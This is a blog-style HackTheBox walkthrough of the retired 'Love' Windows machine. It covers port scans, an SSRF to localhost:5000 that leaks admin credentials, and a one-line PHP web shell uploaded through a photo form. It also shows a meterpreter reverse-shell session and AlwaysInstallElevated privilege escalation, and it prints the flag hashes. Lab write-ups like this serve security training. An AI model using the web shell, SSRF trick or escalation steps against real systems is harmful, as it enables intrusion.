HackTheBox: Love Machine Solution

4 minute read

Haven’t done any HackTheBox in a while so I decided to jump back into it with an easy machine. Hope to have a medium solution posted in the near future. Love recently retired so let’s get into it :)

Pwned

0x00 Recon

Starting off with some basic recon, we have a few open ports to look at:

Nmap scan report for 10.10.10.239
Host is up (0.016s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after:  2022-01-18T14:00:16
| MD5:   bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   JavaRMI: 
|_    Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after:  2024-04-10T14:39:19
| MD5:   d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-07-31T21:10:28+00:00; +23m35s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC

Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

The nmap scan revealed some domains to us, let’s add those to our /etc/hosts file so they’ll resolve:

  • www.love.htb
  • staging.love.htb

Wfuzz also revealed an /admin endpoint on the root domain:

Target: http://love.htb/FUZZ
Total requests: 4697

===================================================================
ID           Response   Lines    Word     Chars       Payload                      
===================================================================
...SNIP...                   
000000511:   301        9 L      30 W     337 Ch      "admin"                      
000002181:   200        125 L    324 W    4388 Ch     "index.php"                  
000001696:   503        11 L     44 W     402 Ch      "examples"                   

Furthermore, we have 3 separate web services running on this box:

  • Admin panel on root domain
  • File scanner on staging subdomain
  • Unknown resource we cannot access on port 5000 (??)

Accessing the root domain we’re greeted with a login panel of which we dont have the creds to just yet. Root

After trying some basic SQLi auth bypass tricks on the root domain, I determined that wasnt quite the path forward and decided to check out the other staging subdomain. Staging

This particular service was kind enough to provide us some functionality without needing any creds :). After exploring the /beta endpoint, the first thing that comes to mind is SSRF. Typically anytime a service will scan an external web resource on your behalf, SSRF is a risk and should be checked for.

I spent far too much time giving this thing URLs before remembering it’s common to bind to ALL interfaces 😉. Remember to keep things simple! Supplying http://localhost:5000/ vs http://10.10.10.239:5000/ gives far different results, and we end up retrieving some creds! admin:@LoveIsInTheAir!!!! Creds

0x01 Admin Panel Access

The creds found above work on the admin panel located at http://love.htb/admin. Admin Admin of the voting system appears to be “Neovic Devierte”. Attempting to access the “print” functionality gives us a full path disclosure:

Warning: “continue” targeting switch is equivalent to “break”. Did you mean to use “continue 2”? in C:\xampp\htdocs\omrs\tcpdf\tcpdf.php on line 17778 TCPDF ERROR: Some data has already been output, can’t send PDF file

Knowing we have the SSRF from earlier, I decide to check out what’s in the tcpdf.php file. Nothing useful…Kept exploring around admin dashboard, which led to discovering the photo upload functionality. Easily uploaded custom php shell to: images/shell.php

Shell Src

<? $x = system($_GET['x']);>

0x02 Foothold

Our basic php shell lets us execute system commands, lets find out who we are!

GET /images/shell.php?x=whoami HTTP/1.1
Host: www.love.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://www.love.htb/admin/voters.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=hfi9rkokgavfkglrb7doti96ef
Connection: close

HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 21:50:11 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

love\phoebe

I decided I hated executing commands via HTTP so I threw a quick meterpreter payload (abusing the same upload functionality) and spawned a real reverse shell

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  1         meterpreter x86/windows  LOVE\Phoebe @ LOVE  10.10.14.7:4444 -> 10.10.10.239:54399 (10.10.10.239)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

0x03 Flags

User

Grabbing user was as simple as reading the Desktop for user.txt

Flag spoiler! user.txt : 44412c39d7d79abf83eff963d7500e83

Root

Uploading the WinPEAS enum script (think LinEnum for Windows) and running it on the target revealed some interesting things. The one that stood out the most, and something I was unaware of when it comes to Windows exploitation; is the AlwaysInstallElevated registry key:

  • https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

Metasploit makes quick work of this configuration oversight: use exploit/windows/local/always_install_elevated.

Pass it the unpriv meterpreter session and viola!

Flag spoiler! root : e6cc8c65105f3cc328a5243d382e7fef

Updated: